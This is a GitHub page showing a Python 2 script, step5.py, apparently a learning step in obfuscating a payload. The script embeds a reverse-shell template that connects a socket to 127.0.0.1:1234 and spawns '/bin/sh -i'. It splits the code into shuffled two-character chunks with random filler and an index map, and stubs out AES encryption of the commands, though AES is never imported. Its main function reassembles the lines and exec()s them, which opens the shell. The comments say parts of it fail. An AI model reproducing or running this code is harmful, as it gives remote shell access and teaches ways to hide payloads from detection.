-
Notifications
You must be signed in to change notification settings - Fork 16
/
step5.py
137 lines (129 loc) · 4.65 KB
/
step5.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
import re,random,string
template_reverse_shell = """
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
"""
template_reverse_shell = template_reverse_shell.strip().rstrip()
arrayList = []
def fillList(arrayBrokenShellCode,toFill):
for i in range(0,toFill):
arrayBrokenShellCode.append("aa")
return arrayBrokenShellCode
def generateArrayList(l):
# l = l.replace(r'\[','\\[').replace(r'\]','\\]').replace(r'\(','\\(').replace(r'\)','\\)')
arrayBrokenShellCode = re.findall('..?',l)
# x = map(lambda foo: foo.replace('a', 'b'), x), Example
# x = map(lambda arrayBrokenShellCode: arrayBrokenShellCode[x].replace(r'[','\['),replace(r']','\]'),x)
# # arrayBrokenShellCode = list(x)
# # for i, v in enumerate(x) :
# # x[i] = v.replace("a","b")
# for v in enumerate(arrayBrokenShellCode):
# # v = arrayBrokenShellCode[i]
# # print v
# i = arrayBrokenShellCode.index(v)
# # print i,v
# arrayBrokenShellCode[i] = v.replace("[","\[").replace("]","\]")
# print arrayBrokenShellCode
# for pair in arrayBrokenShellCode:
# pair = pair.replace(r"[","\[").replace(r"]","\]")
arrayBSOrig = list(arrayBrokenShellCode)
# print "DEBUG: ",arrayBSOrig
toFill = 50 - len(arrayBrokenShellCode)
arrayBrokenShellCode = fillList(arrayBrokenShellCode,toFill)
arrayShuffled = random.sample(arrayBrokenShellCode,len(arrayBrokenShellCode))
for i in arrayShuffled:
if i == 'aa' or None:
char = ''.join(random.choice(string.ascii_lowercase) for i in range(2))
arrayShuffled[arrayShuffled.index(i)] = char
return arrayShuffled,arrayBSOrig
scmap = []
def remap(arrayBSOrig,arrayShuffled):
for word in arrayBSOrig:
# print "Word query:\r\n",word
mapped = arrayShuffled.index(word)
scmap.append(mapped)
return scmap
def reconstituteSC(arrayShuffled,scmap):
cmd=""
for index in scmap:
# # print 'DEBUG: Value of Array of Index: \r\n{}'.format(str(index)),arrayShuffled
cmd += arrayShuffled[index]
# print "Command string built:\r\n",cmd
# # print 'DEBUG: Value of cmd to be executed: \r\n{}'.format(str(cmd))
cmd = cmd.strip().rstrip()
print "Executing Command:\r\n{}".format(str(cmd))
exec(cmd)
return cmd
def reconstituteOrig(arrayBSOrig):
# for
# cmd = ""
shell=[]
# for v in arrayBSOrig:
# cmd = "{}{}".format(str(cmd),str(v))
# shell.append(cmd)
for x in arrayBSOrig:
cmd = ""
try:
cmd = "".join(x)
shell.append(cmd)
except:
pass
print shell
for c in shell:
cmd = c
print "Executing Command:\r\n{}".format(str(cmd))
exec(cmd)
return
# def fuckthisshit(arrayBSOrig):
# for x in arrayBSOrig:
# sublist = x
# for y in sublist:
# cmd = "".join(y)
# print cmd
# return
def generateKey(size=32,chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def generateIV(size=16,chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def cryptor(shellcommands, key, IV):
obj = AES.new(key,AES.MODE_CFB,IV)
# #print "DEBUG: Shell Commands", shellcommands
ciphertext = obj.encrypt(shellcommands)
# #print "DEBUG: Ciphertext", ciphertext
return ciphertext
def safeDecryptShellCommands(ciphertext, key, IV):
obj3 = AES.new(key,AES.MODE_CFB,IV)
plainTextCmd = obj3.decrypt(ciphertext)
#print plainTextCmd
return plainTextCmd
def main():
decryptKey = generateKey()
decryptIV = generateIV()
lines = template_reverse_shell.splitlines()
for l in lines:
arrayShuffled, arrayBSOrig = generateArrayList(l)
# print "Shuffled array\r\n",arrayShuffled,"\r\nOriginal array\r\n",arrayBSOrig
scmap = remap(arrayBSOrig,arrayShuffled)
# reconstituteSC(arrayShuffled,scmap)
# reconstituteOrig(arrayBSOrig)
# fuckthisshit(arrayBSOrig)
for l in lines:
array = re.findall('..?',l)
print array
cmd = "".join(array)
print "Reconstituted:\r\n",cmd
exec(cmd)
# Figure out why the fuck this doesn't work
# Its as if you got the array from the same function, it will work
# But if you got it from calling a different function, it doesn't work.
# for x in arrayBSOrig:
# cmd = "".join(x)
# print cmd
# exec(cmd)
return
main()